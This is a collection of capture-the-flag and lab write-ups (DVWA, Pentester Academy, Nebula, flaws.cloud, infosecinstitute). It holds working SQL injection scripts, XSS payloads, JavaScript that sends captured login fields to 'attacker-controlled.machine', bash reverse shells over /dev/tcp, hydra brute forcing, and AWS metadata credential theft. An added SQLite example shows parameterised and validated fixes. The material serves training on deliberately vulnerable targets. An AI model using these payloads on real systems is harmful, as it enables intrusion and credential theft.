"http://192.168.56.101/DVWA/vulnerabilities/sqli/index.php?id='+union+select+Password%2CUser+FROM+users%23&Submit=Submit" | grep union 68 | 69 | #### Automated exploitation 70 | 71 | # identify SQLi 72 | $ wfuzz.py -p 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" -w ~/BUILDS/wfuzz/wordlist/Injections/SQL.txt --ss error "http://192.168.56.101/DVWA/vulnerabilities/sqli/index.php?id=FUZZ&Submit=Submit" 73 | 74 | # confirm SQLi 75 | $ sqlmap.py --dbms=MySQL --os=Linux --batch --cookie="PHPSESSID=${PHPSESSID};security=low" --technique=U -u "http://192.168.56.101/DVWA/vulnerabilities/sqli/index.php?id=3&Submit=Submit" -p "id" -t 
./sqlmap.log 76 | 77 | # exploit SQLi 78 | $ sqlmap.py --dbms=MySQL --os=Linux --batch http://127.0.0.1:8080 --cookie="PHPSESSID=${PHPSESSID};security=low" --technique=U -u "http://192.168.56.101/DVWA/vulnerabilities/sqli/index.php?id=3&Submit=Submit" -p "id" -t ./sqlmap-exp.log -s sqlmap.session --dump -T users 79 | 80 | ### Sql Injection (Blind) 81 | 82 | Deps: 83 | 84 | https://stackoverflow.com/questions/296536/how-to-urlencode-data-for-curl-command 85 | 86 | #### Manual exploitation 87 | 88 | # detecting (blind) SQLi 89 | $ curl -s -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" "http://192.168.56.101/DVWA/vulnerabilities/sqli_blind/index.php?id=$(rawurlencode "1' and 1=1#")&Submit=Submit" | grep 'User ID' | tail -1 90 | $ curl -s -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" "http://192.168.56.101/DVWA/vulnerabilities/sqli_blind/index.php?id=$(rawurlencode "1' and 1=0#")&Submit=Submit" | grep 'User ID' | tail -1 91 | 92 | Exploitation (retreiving DBMS version): 93 | 94 | ``` 95 | $ cat > py.py << EOF 96 | """ 97 | example output of @@version: 5.7.16-0ubuntu0.16.04.1 98 | 99 | first find length of the @@version string: 100 | 1' and length(@@version)=7# 101 | 102 | iterate thru printable ASCII and retreive @@version string 103 | 1' and ascii(substring(@@version,1,1))=0x35# 104 | """ 105 | 106 | import requests 107 | import string 108 | from urllib import quote, unquote 109 | 110 | proxies = { 111 | "http" : "http://127.0.0.1:8080/" 112 | } 113 | 114 | # initiate HTTP session 115 | session = requests.Session() 116 | session.cookies['security'] = 'low' 117 | session.cookies['PHPSESSID'] = 'pjkq87qc7944tu6deo466g32q1' 118 | 119 | u = 'http://192.168.56.101/DVWA/vulnerabilities/sqli_blind/index.php?id=' 120 | 121 | # find length of @@version string 122 | for i in xrange(1, 30): 123 | payload = "1' and length(@@version)=" + str(i) + "#" 124 | resp = session.get(u + quote(payload) + "&Submit=Submit", proxies=proxies) 125 | 126 | print "{0}: 
{1}".format(i, resp.status_code) 127 | if resp.status_code == 200: 128 | len = i 129 | break 130 | 131 | version="" 132 | 133 | # retreive @@version string 134 | for i in xrange(1, len + 1): 135 | for c in string.printable: 136 | payload = "1' and ascii(substring(@@version,{0},1))={1}#".format(i, hex(ord(c))) 137 | resp = session.get(u + quote(payload) + "&Submit=Submit", proxies=proxies) 138 | 139 | if resp.status_code == 200: 140 | print payload 141 | version += c 142 | 143 | print version 144 | EOF 145 | ``` 146 | 147 | Trigger: 148 | 149 | $ python py.py 150 | 151 | #### Automated exploitation 152 | 153 | # detect (blind) SQLi 154 | $ sqlmap.py --batch --cookie="PHPSESSID=${PHPSESSID};security=low" --technique=B -u "http://192.168.56.101/DVWA/vulnerabilities/sqli_blind/index.php?id=3&Submit=Submit" -p "id" -t ./sqlmap.log 155 | 156 | # exploitation (retreiving DBMS version) 157 | $ sqlmap.py --batch --cookie="PHPSESSID=${PHPSESSID};security=low" --technique=B -u "http://192.168.56.101/DVWA/vulnerabilities/sqli_blind/index.php?id=3&Submit=Submit" -p "id" -t ./sqlmap.log --sql-query="SELECT version(); 158 | 159 | ### XSS (DOM) 160 | 161 | Payload that ilustrates vulnerability: 162 | 163 | English 164 | 165 | ### XSS (Reflected) 166 | 167 | Trigger vulnerability (via browser): 168 | 169 | http://192.168.56.101/DVWA/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E# 170 | 171 | ### XSS (Stored) 172 | 173 | Inject payload: 174 | 175 | $ curl -s -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=low" "http://192.168.56.101/DVWA/vulnerabilities/xss_s/" --data "txtName=xxx&mtxMessage=$(rawurlencode "")&btnSign=Sign+Guestbook" 176 | 177 | ### Bonus 1 178 | 179 | Session fixation - PHPSESSID is not regenerated after logging in 180 | -------------------------------------------------------------------------------- /DVWA/dvwa-medium.md: -------------------------------------------------------------------------------- 1 | 2 | ### Target 3 | 4 | 
https://github.com/ethicalhack3r/DVWA

Security level: medium

### Prereq

# get user token
$ TOKEN=$(curl -c dvwa.session -s http://192.168.56.101/DVWA/login.php | grep 'user_token' | awk -F 'value=' '{print $2}' | cut -d"'" -f2)

# get session id
$ PHPSESSID=$(grep PHPSESSID dvwa.session | awk -F' ' '{print $7}')

# log in
$ curl -L -b "PHPSESSID=${PHPSESSID};security=medium" -v -d "username=admin&password=password&Login=Login&user_token=${TOKEN}" http://192.168.56.101/DVWA/login.php

### Brute Force

$ wget https://raw.githubusercontent.com/seifreed/dirb/master/wordlists/others/best110.txt

$ hydra -t 8 -l admin -P best110.txt -vV 192.168.56.101 http-get-form "/DVWA/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:F=password incorrect:H=Cookie: PHPSESSID=${PHPSESSID};security=medium"

### Command Injection

```
# '\n' (%0a) as a shell command separator
$ curl -s -b "PHPSESSID=${PHPSESSID};security=medium" -d 'ip=%0auname+-a&Submit=Submit' http://192.168.56.101/DVWA/vulnerabilities/exec/index.php | grep Linux

OR

# '&' (%26) as a shell command separator
$ curl -s -b "PHPSESSID=${PHPSESSID};security=medium" -d 'ip=%26uname+-a&Submit=Submit' http://192.168.56.101/DVWA/vulnerabilities/exec/index.php | grep Linux
```

### File Upload

**Vuln:** insufficient file type validation: only the client-controlled MIME type ($_FILES['userfile']['type']) is checked

**Exploitation**

```
cat > b.php <
EOF

curl -x 127.0.0.1:8080 -L -b "PHPSESSID=${PHPSESSID};security=medium" -F "MAX_FILE_SIZE=100000" -F "uploaded=@b.php;type=image/jpeg;filename=b.php" -F "Upload=Upload" http://192.168.56.101/DVWA/vulnerabilities/upload/index.php

curl -s -b "PHPSESSID=${PHPSESSID};security=medium" http://192.168.56.101/DVWA/hackable/uploads/b.php
```

### File Inclusion

**Vuln:** insufficient input validation

**Exploitation**

```
# LFI:
$ curl -L -b "PHPSESSID=${PHPSESSID};security=medium" -v http://192.168.56.101/DVWA/vulnerabilities/fi/?page=..././..././hackable/flags/fi.php

# RFI payload example:
hTTp://
```

### Sql Injection

**Vuln:** incorrect use of the mysqli_real_escape_string function: the escaped value is not wrapped in quotes, so the input is treated as an integer and a payload that contains no quotes passes through the escaping untouched

Payload to retrieve the users' password fields:

```
1 union select Password, User from users#
```

**Exploitation**

```
$ curl -s -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=medium" "http://192.168.56.102/DVWA/vulnerabilities/sqli/index.php" -d 'id=1+union+select+Password%2CUser+FROM+users%23&Submit=Submit'
```

### Sql Injection (Blind)

**Vulnerability**

Payloads:

```
true condition: 1 and 1=1#
false condition: 1 and 1=0#
```

**Exploitation**

Manual:

```
# dependency:
https://stackoverflow.com/questions/296536/how-to-urlencode-data-for-curl-command

# true condition:
curl -s -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=medium" "http://192.168.56.102/DVWA/vulnerabilities/sqli_blind/index.php" -d "id=$(rawurlencode "1 and 1=1#")&Submit=Submit"

# false condition:
curl -s -x 127.0.0.1:8080 -b "PHPSESSID=${PHPSESSID};security=medium" "http://192.168.56.102/DVWA/vulnerabilities/sqli_blind/index.php" -d "id=$(rawurlencode "1 and 1=0#")&Submit=Submit"
```

Retrieving the DBMS version, PoC:

```
cat > poc.py <
```

### XSS (Reflected)

http://192.168.56.102/DVWA/vulnerabilities/xss_r/?name=%3C/pre%3E%3CScRiPt%3Ealert(1)%3C%2Fscript%3E%3Cpre%3E#

### XSS (DOM)

Payload that illustrates the vulnerability (this time the filtering is done on the server side, so we use the '#' fragment to keep the payload from being sent to the server):

English#

Or do not use 'script' tags:

English

### XSS (Stored)

Payload for the `txtName` field: ``
-------------------------------------------------------------------------------- /PentesterAcademy/js-for-pentesters.md: --------------------------------------------------------------------------------

### Target

https://www.pentesteracademy.com/course?id=11

### Prereq

Include this in your `.bashrc`:

https://stackoverflow.com/questions/296536/how-to-urlencode-data-for-curl-command/10660730#10660730

### Task 1

https://pentesteracademylab.appspot.com/lab/webapp/jfp/1

**Solution**

```
https://pentesteracademylab.appspot.com/lab/webapp/jfp/1?url=

Payload generation:
$ rawurlencode ''
$ rawurlencode ''
```

### Task 2

https://pentesteracademylab.appspot.com/lab/webapp/jfp/2

**Solution**

```
https://pentesteracademylab.appspot.com/lab/webapp/jfp/2?url=

Payload generation:
$ rawurlencode ''
```

### Task 3

https://pentesteracademylab.appspot.com/lab/webapp/jfp/3

**Solution**

https://pentesteracademylab.appspot.com/lab/webapp/jfp/3?email=abc@xyz.com&password=111&url=

Preparing the payload (adding a rogue `` tag):

```
$ cat > JSforPentesters-3.js <<'EOF'
function intercept() {
  new Image().src = "https://attacker-controlled.machine/3?email=" + document.forms[0].elements[0].value + "&password=" + document.forms[0].elements[1].value;
  return false;
}
document.forms[0].onsubmit = intercept;
EOF

$ rawurlencode ""
```

Alternative payload (triggering an `xhr` request: the cross-origin request violates the browser's same-origin policy, but it is still sent; only the response is blocked by the browser):

```
$ cat > JSforPentesters-3-2.js <<'EOF'
function intercept() {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://attacker-controlled.machine/3?email=" + document.forms[0].elements[0].value + "&password=" + document.forms[0].elements[1].value);
  xhr.send();
  return false;
}
document.forms[0].onsubmit = intercept;
EOF

$ rawurlencode ""
```

### Task 4

https://pentesteracademylab.appspot.com/lab/webapp/jfp/4

**Solution**

https://pentesteracademylab.appspot.com/lab/webapp/jfp/4?email=abc@xyz.com&password=111&url=

Payload generation:

```
$ cat > JSforPentesters-4.js <<'EOF'
pin = document.createElement("input");
pin.setAttribute("type", "text");
pin.setAttribute("value", "");
pin.setAttribute("class", "input-block-level");
pin.setAttribute("placeholder", "ATM Pin");
pin.setAttribute("name", "pin");
document.forms[0].insertBefore(pin, document.forms[0].elements[1]);
EOF

$ rawurlencode ""
```
-------------------------------------------------------------------------------- /README.md: --------------------------------------------------------------------------------
## CTF-Writeups

My writeups of various CTFs, security challenges and vulnerability testbeds.
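An added example, not part of the original writeups, tying together the DVWA SQL injection notes above (the medium-level union payload `1 union select Password, User from users#` and the blind `1 and 1=1#` probes share one root cause): the escaped-but-unquoted lookup reproduced against an in-memory SQLite table, beside a bound-parameter version and an integer-validation version. SQLite has no `#` comment so the payload is used without it; the table, rows and the `escape_like_mysqli` stand-in for `mysqli_real_escape_string` are all constructed here.

```python
import sqlite3

# Constructed sample rows standing in for DVWA's users table.
SAMPLE_USERS = [
    (1, "admin", "admin", "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "gordonb", "Gordon", "Brown", "e99a18c428cb38d5f260853678922e03"),
]


def make_db():
    """Build the in-memory table the three lookups run against."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (user_id INTEGER, user TEXT, first_name TEXT, "
        "last_name TEXT, password TEXT)"
    )
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return db


def escape_like_mysqli(value):
    """Stand-in for mysqli_real_escape_string: backslash-escapes quotes and
    backslashes. A payload with no quotes in it comes back unchanged."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def lookup_medium(db, user_input):
    """DVWA 'medium' pattern: escaped value concatenated without surrounding
    quotes, so SQL keywords in the input are parsed as SQL."""
    sql = ("SELECT first_name, last_name FROM users WHERE user_id = "
           + escape_like_mysqli(user_input))
    return db.execute(sql).fetchall()


def lookup_parameterised(db, user_input):
    """Fix 1: bind the value. The whole string is compared as data and is
    never parsed as SQL, whatever it contains."""
    return db.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_input,)
    ).fetchall()


def lookup_validated(db, user_input):
    """Fix 2 (defence in depth): an integer id must look like one before it
    reaches the database at all."""
    if not user_input.isdigit():
        raise ValueError("user_id must be a positive integer")
    return db.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (int(user_input),)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "1 union select password, user from users"
    print("medium:", lookup_medium(db, payload))          # leaks password hashes
    print("parameterised:", lookup_parameterised(db, payload))  # []
    try:
        lookup_validated(db, payload)
    except ValueError as exc:
        print("validated:", exc)
```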
4 | 5 | ### Burp Academy 6 | 7 | [Burp Academy Labs (all)](Burp-Academy/burp-academy.md) 8 | 9 | [SQL injection (SQLi)](Burp-Academy/burp-academy.md#sql-injection) 10 | 11 | [XSS](Burp-Academy/burp-academy.md#xss) 12 | 13 | [OAuth authentication](Burp-Academy/burp-academy.md#oauth-authentication) 14 | 15 | [XML external entity (XXE) injection](Burp-Academy/burp-academy.md#xml-external-entity-xxe-injection) 16 | 17 | [Cross-site request forgery (CSRF)](Burp-Academy/burp-academy.md#cross-site-request-forgery-csrf) 18 | 19 | [Access control vulnerabilities](Burp-Academy/burp-academy.md#access-control-vulnerabilities) 20 | 21 | [HTTP Host header attacks](Burp-Academy/burp-academy.md#http-host-header-attacks) 22 | 23 | [SSRF](Burp-Academy/burp-academy.md#ssrf) 24 | 25 | [CORS](Burp-Academy/burp-academy.md#cors) 26 | 27 | [OS command injection](Burp-Academy/burp-academy.md#os-command-injection) 28 | 29 | [Directory traversal](Burp-Academy/burp-academy.md#directory-traversal) 30 | 31 | [Insecure deserialization](Burp-Academy/burp-academy.md#insecure-deserialization) 32 | 33 | [File upload vulnerabilities](Burp-Academy/burp-academy.md#file-upload-vulnerabilities) 34 | 35 | [Business logic vulnerabilities](Burp-Academy/burp-academy.md#business-logic-vulnerabilities) 36 | 37 | [WebSockets](Burp-Academy/burp-academy.md#websockets) 38 | 39 | [Clickjacking](Burp-Academy/burp-academy.md#clickjacking) 40 | 41 | [JWT](Burp-Academy/burp-academy.md#jwt) 42 | 43 | ### Pentester Academy 44 | 45 | [JS for Pentesters](PentesterAcademy/js-for-pentesters.md) 46 | 47 | ### wechall.net 48 | 49 | [wechall](wechall.net/wechall.md) 50 | 51 | [natas](wechall.net/natas.md) (overthewire.org) 52 | 53 | ### ropemporium.com 54 | 55 | [32bit binaries](ropemporium.com/ropemporium32.md) 56 | 57 | [64bit binaries](ropemporium.com/ropemporium64.md) 58 | 59 | ### flaws.cloud 60 | 61 | [flaws.cloud](flaws.cloud/flaws.cloud.md) 62 | 63 | ### hacking-lab.com 64 | 65 | 
[Webgoat](hacking-lab.com/webgoat/README.md) 66 | 67 | [Top 10](hacking-lab.com/top10.md) 68 | 69 | ### rozwal.to 70 | 71 | [my profile](https://stary.rozwal.to/profile/mzet) 72 | 73 | ### ctf.infosecinstitute.com 74 | 75 | [ctf.infosecinstitute.com](ctf.infosecinstitute.com/README.md) 76 | 77 | ### DVWA (Damn Vulnerable Web Application) 78 | 79 | [DVWA: low](DVWA/dvwa-low.md) 80 | 81 | [DVWA: medium](DVWA/dvwa-medium.md) 82 | 83 | [DVWA: hard](DVWA/dvwa-hard.md) 84 | 85 | ### exploit-exercises.com 86 | 87 | [Nebula](exploit-exercises.com/nebula.md) 88 | 89 | ### 0CTF 2016 Quals 90 | 91 | [Monkey](0CTF%202016%20Quals/monkey.md) 92 | -------------------------------------------------------------------------------- /ctf.infosecinstitute.com/README.md: -------------------------------------------------------------------------------- 1 | 2 | ## Level 1 3 | 4 | ``` 5 | $ curl -s http://ctf.infosecinstitute.com/levelone.php | grep flag 6 | ``` 7 | 8 | flag: `infosec_flagis_welcome` 9 | 10 | ## Level 2 11 | 12 | ``` 13 | $ curl -s http://ctf.infosecinstitute.com/leveltwo.php | grep img 14 | $ curl -s http://ctf.infosecinstitute.com/img/leveltwo.jpeg | openssl base64 -d 15 | ``` 16 | 17 | flag: `infosec_flagis_wearejuststarting` 18 | 19 | ## Level 3 20 | 21 | Dependencies: 22 | zbar-tools 23 | bsdgames 24 | 25 | ``` 26 | $ curl -s http://ctf.infosecinstitute.com/levelthree.php | grep img 27 | $ wget http://ctf.infosecinstitute.com/img/qrcode.png 28 | $ zbarimg -q --raw qrcode.png | morse -ds 29 | ``` 30 | 31 | flag: `INFOSECFLAGISMORSING` 32 | 33 | ## Level 4 34 | 35 | ``` 36 | $ alias rot13="tr '[A-Za-z]' '[N-ZA-Mn-za-m]'"; curl -vvv http://ctf.infosecinstitute.com/levelfour.php 2>&1 | grep Set-Cookie | awk '{print $3}' | rot13 37 | ``` 38 | 39 | flag: `infosec_flagis_welovecookies` 40 | 41 | ## Level 5 42 | 43 | Dependencies: 44 | steghide 45 | 46 | ``` 47 | $ curl -s http://ctf.infosecinstitute.com/levelfive.php | grep img 48 | $ wget 
http://ctf.infosecinstitute.com/img/aliens.jpg 49 | $ steghide --extract -q -p '' -sf aliens.jpg -xf - | python3 -c "import binascii; x=int(input(),2); print(binascii.unhexlify('%x' % x))" 50 | ``` 51 | 52 | flag: `infosec_flagis_stegaliens` 53 | 54 | ## Level 6 55 | 56 | ``` 57 | $ wget http://ctf.infosecinstitute.com/misc/sharkfin.pcap 58 | $ strings sharkfin.pcap | head -1 | xxd -p -r 59 | ``` 60 | 61 | flag: `infosec_flagis_sniffed` 62 | 63 | ## Level 7 64 | 65 | ``` 66 | $ curl -s -v http://ctf.infosecinstitute.com/levelseven.php 2>&1 | grep 200 | awk '{print $4}' | openssl base64 -d 67 | ``` 68 | 69 | flag: `infosec_flagis_youfoundit` 70 | 71 | ## Level 8 72 | 73 | ``` 74 | $ wget http://ctf.infosecinstitute.com/misc/app.exe 75 | $ strings app.exe | grep flag 76 | ``` 77 | 78 | flag: `infosec_flagis_0x1a` 79 | 80 | ## Level 9 81 | 82 | ``` 83 | $ lynx -dump -listonly http://www.google.com/search?q='Cisco IDS default password' | grep cisco | head -1 | awk '{print $2}' | lynx -dump - | grep 'default password' 84 | $ curl -s --data 'username=root&password=attack' http://ctf.infosecinstitute.com/levelnine.php | grep alert | grep -o "'.*'" | sed "s/'//g" | rev 85 | ``` 86 | 87 | ## Level 10 88 | 89 | Dependencies: 90 | audacity 91 | 92 | ``` 93 | $ wget http://ctf.infosecinstitute.com/misc/Flag.wav 94 | $ audacity Flag.wav 95 | (audacity GUI) Adjust 'Playback speed' to hear recognizable audio 96 | ``` 97 | 98 | flag: `infosec_flagis_found` 99 | 100 | ## Level 11 101 | 102 | ``` 103 | $ curl -s http://ctf.infosecinstitute.com/leveleleven.php | grep img 104 | $ wget http://ctf.infosecinstitute.com/img/php-logo-virus.jpg 105 | $ strings php-logo-virus.jpg | head -3 | tail -1 | awk -F'_' '{print $3}' | base64 -d 106 | ``` 107 | 108 | flag: `infosec_flagis_powerslide` 109 | 110 | ## Level 12 111 | 112 | ``` 113 | $ diff -u <(curl -s http://ctf.infosecinstitute.com/leveleleven.php) <(curl -s http://ctf.infosecinstitute.com/leveltwelve.php) | grep design | grep -o '".*"' 
| awk '{print $1}' | sed 's/"//g' 114 | $ curl -s 'http://ctf.infosecinstitute.com/css/design.css' | grep color | awk '{print $2}' | xxd -r -p 115 | ``` 116 | 117 | flag: `infosec_flagis_heyimnotacolor` 118 | 119 | ## Level 13 120 | 121 | ``` 122 | $ curl -s ctf.infosecinstitute.com/levelthirteen.php.old 123 | $ wget ctf.infosecinstitute.com/misc/imadecoy 124 | $ wireshark imadecoy (GUI -> File -> Export Objects -> HTTP -> HoneyPY.PNG) 125 | $ ristretto HoneyPY.PNG 126 | ``` 127 | 128 | flag: `infosec_flagis_morepackets` 129 | 130 | ## Level 14 131 | 132 | ``` 133 | $ curl -s http://ctf.infosecinstitute.com/misc/level14 | grep '(104' | tail -1 | awk '{print $2}' | tr -d "',\\\\u00" | xxd -p -r 134 | ``` 135 | 136 | flag: `infosec_flagis_whatsorceryisthis` 137 | 138 | ## Level 15 139 | 140 | ``` 141 | $ curl -s http://ctf.infosecinstitute.com/levelfifteen/.hey 142 | $ firefox http://crypo.in.ua/tools/eng_atom128d.php 143 | ``` 144 | 145 | flag: `infosec_flagis_rceatomized` 146 | -------------------------------------------------------------------------------- /exploit-exercises.com/nebula.md: -------------------------------------------------------------------------------- 1 | 2 | ### Challenge link 3 | 4 | https://exploit-exercises.com/nebula/ 5 | 6 | ### Level 00 7 | 8 | $ find / -perm -4000 -user flag00 2> /dev/null 9 | 10 | ### Level 01 11 | 12 | $ echo -e '#!/bin/bash\n/bin/sh -c getflag' > ./echo; chmod +x ./echo; PATH=./:"$PATH" /home/flag01/flag01 13 | 14 | ### Level 02 15 | 16 | $ USER='`/bin/sh -c getflag`' /home/flag02/flag02 17 | 18 | ### Level 03 19 | 20 | ``` 21 | #!/bin/bash 22 | 23 | echo 'getflag > output2' > /home/flag03/writable.d/mz 24 | echo 'Please wait while cron execute your command ...' 25 | while [ ! 
-f /home/flag03/output2 ]; do sleep 1; done 26 | cat /home/flag03/output2 27 | ``` 28 | 29 | ### Level 04 30 | 31 | My comments: 32 | 33 | ``` 34 | # this won't work (cause su won't take password from stdin) 35 | # echo `DST=/home/flag04; ln -s $DST/token lnk; $DST/flag04 ./lnk` | su - 36 | 37 | # this also won't work on Ubuntu (why?) 38 | # echo `DST=/home/flag04; ln -s $DST/token lnk; $DST/flag04 ./lnk` | sudo -u flag04 -S -s getflag 39 | 40 | # so to automate it I had to use trick that I've learned from http://vladz.devzero.fr/002_su-stdin.php 41 | ``` 42 | 43 | My solution: 44 | 45 | $ echo -e '#include \n #include \n #include \n main(int argc, char *argv[]) { char c[512]; int i; sprintf(c, "%s\\n", argv[1]); for(i=0; i 65 | #include 66 | #include 67 | 68 | main(int argc, char *argv[]) 69 | { 70 | char c[512]; 71 | int i; 72 | sprintf(c, "%s\n", argv[1]); 73 | for(i=0; i\n #include \n #include \n main(int argc, char *argv[]) { char c[512]; int i; sprintf(c, "%s\\n", argv[1]); for(i=0; i& /dev/tcp// 0>&1 108 | PAYLOAD2=bash%20%2Di%20%3E%26%20/dev/tcp/${REVERSE_IP}/${REVERSE_PORT}%200%3E%261 109 | 110 | if [ -z "$1" ] 111 | then 112 | echo "Usage: `basename $0` " 113 | exit 1 114 | fi 115 | 116 | (sleep 1; curl http://${IP}:7007/index.cgi?Host=localhost%3B"${PAYLOAD2}") & 117 | nc -l -p 2222 -vvv 118 | ``` 119 | 120 | ### Level08 121 | 122 | ``` 123 | # hex representation of "follow TCP stream" option on first (and only) stream in tshark: 124 | $ tshark -z follow,tcp,hex,0 -r capture.pcap 125 | 126 | # we see interesting string where dots are 0x7f (DELETE in ASCII): 127 | backdoor...00Rm8.ate 128 | 129 | # when we will treat dots as DELETEs (backspaces) we will get the password (we can simulate backspaces with '\b' with echo command): 130 | $ echo -e "backdoor\b\b\b00Rm8\bate" 131 | backd00Rmate 132 | 133 | $ su flag08 134 | ``` 135 | 136 | ### Level10 137 | 138 | classic TOCTOU problem: 139 | 140 | ``` 141 | # listen for "file uploads": 142 | $ while [ 1 ]; do 
nc -l 18211; done 143 | 144 | # prepare symlink which alternately links to 'fileToWhichIHaveAccess' and to 'token' files: 145 | $ echo 'fileToWhichIHaveAccess' > /home/level10/fileToWhichIHaveAccess 146 | $ while [ 1 ]; do ln -sf /home/level10/fileToWhichIHaveAccess /tmp/lnk; ln -sf /home/flag10/token /tmp/lnk; rm /tmp/lnk; done 147 | 148 | # execute vulnerable binary: 149 | while [ 1 ]; do ./flag10 /tmp/lnk 127.0.0.1; done 150 | ``` 151 | 152 | ### Level12 153 | 154 | **Vuln:** 155 | 156 | Lack of input data validation of popen() parameter: 157 | 158 | ``` 159 | prog = io.popen("echo "..password.." | sha1sum", "r") 160 | ``` 161 | 162 | One can simply inject os command (reverse shell for example): 163 | 164 | ``` 165 | 192.168.8.100$ nc -l -p 2222 166 | victim$ echo "; bash -i >& /dev/tcp/192.168.8.100/2222 0>&1" | nc 127.0.0.1 50001 167 | ``` 168 | -------------------------------------------------------------------------------- /flaws.cloud/flaws.cloud.md: -------------------------------------------------------------------------------- 1 | 2 | ### Level 1: http://flaws.cloud 3 | 4 | **Vulnerability:** bucket's listing access permission set to "Everyone" 5 | 6 | ``` 7 | # determine region 8 | $ host flaws.cloud 9 | $ host 10 | # list bucket content 11 | $ aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2 12 | # get interesting file 13 | $ aws s3 cp s3://flaws.cloud/secret-dd02c7c.html --no-sign-request --region us-west-2 secret-dd02c7c.html 14 | $ cat secret-dd02c7c.html 15 | ``` 16 | 17 | ### Level 2: http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud 18 | 19 | **Vulnerability:** bucket's listing access permission set to "Any Authenticated AWS User" 20 | 21 | $ aws s3 --profile mzetAccount ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud 22 | $ aws s3 --profile mzetAccount cp s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html secret-e4443fc.html 23 | 24 | ### Level 3: 
http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud 25 | 26 | **Vulnerability:** bucket listing access to 'Everyone' + leaking AWS keys by accidently commiting it to git repo kept in the bucket 27 | 28 | ``` 29 | $ aws s3 ls http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud --no-sign-request --region us-west-2 30 | # download content of the bucket: 31 | $ aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2 32 | # retreive secret from git history: 33 | $ git log 34 | $ git stash 35 | $ git checkout f7cebc46b471ca9838a0bdd1074bb498a3f84c87 36 | $ cat secret.txt 37 | # create new profile with found AWS keys & list all available buckets for this account: 38 | $ aws configure --profile flaws.cloud 39 | $ aws --profile flaws s3 ls 40 | ``` 41 | 42 | ### Level 4: http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud 43 | 44 | **Vulnerability:** snapshot of EC2 instance is made accessible to all AWS users (is made 'Public') 45 | 46 | ``` 47 | # identify DNS name of EC2 instance: 48 | $ host 4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud 49 | 50 | # look for snapshot of ec2-35-165-182-7.us-west-2.compute.amazonaws.com machine: 51 | 52 | # first get identity of keys that are used (to filter snapshots only for this user) 53 | $ aws --profile flaws.cloud sts get-caller-identity 54 | # get all snapshots of this (owner-id) user. 
# Note that the request is made from a different AWS account (mzetAccount)
$ aws --profile mzetAccount ec2 describe-snapshots --owner-id 975426262029 --region us-west-2

OR (filter by volume-id):

$ aws --profile flaws.cloud ec2 describe-instances | grep -i volumeid
# get all snapshots of this volume
$ aws --profile mzetAccount ec2 describe-snapshots --filter "Name=volume-id,Values=vol-04f1c039bc13ea950" --region us-west-2

# create a volume from the snapshot:
$ aws --profile mzetAccount ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

# In AWS Console:
# create an EC2 instance with the second volume (snap-0b49342abd1bdcb89) attached

# SSH into the created instance:
$ ssh -i ".ssh/key.pem" @
$ sudo mount /dev/xvdb1 /mnt
$ cat /mnt/home/ubuntu/setupNginx.sh
```

### Level 5: http://level5-d2891f604d2061b6977c2481b0c8333e.flaws.cloud/243f422c/

**Vulnerability:** exposed proxy which doesn't restrict access to the instance's metadata server and the private IP range

```
# attempt to access metadata via the proxy
$ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/

# access the instance's credentials via the proxy (flaws is the IAM role associated with the instance)
$ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws

# use the exposed credentials (from the command above) to list the level6 bucket:
$ export AWS_SESSION_TOKEN=""
$ AWS_ACCESS_KEY_ID='' AWS_SECRET_ACCESS_KEY='' aws s3 ls --recursive s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud
```

### Level 6: level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud/ddcc78ff/

**Vulnerability:** excessive permissions ('SecurityAudit' policy) are granted

```
# confirm your 'level6' identity:
$ aws --profile flaws.cloud3 iam get-user
OR
$ aws --profile flaws.cloud3 sts get-caller-identity

# run the scout2 tool:
$ python Scout2.py --profile flaws.cloud3

# identify/confirm the policies attached to the 'level6' user (the scout2 output should draw your attention to this):
$ aws --profile flaws.cloud3 iam list-attached-user-policies --user-name Level6

# get info about the 'list_apigateway' policy:
$ aws --profile flaws.cloud3 iam get-policy --policy-arn "arn:aws:iam::975426262029:policy/list_apigateways"
$ aws --profile flaws.cloud3 iam get-policy-version --policy-arn "arn:aws:iam::975426262029:policy/list_apigateways" --version-id v4

# AWS API Gateways are commonly used to front AWS Lambda functions; let's check whether that's the case here:
$ aws --region us-west-2 --profile flaws.cloud3 lambda list-functions
$ aws --region us-west-2 --profile flaws.cloud3 lambda get-policy --function-name Level6
$ aws --profile flaws.cloud3 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"

# finally, using: we can construct the Lambda function URL:
https://.execute-api..amazonaws.com//
https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

# visiting this URL reveals the final link:
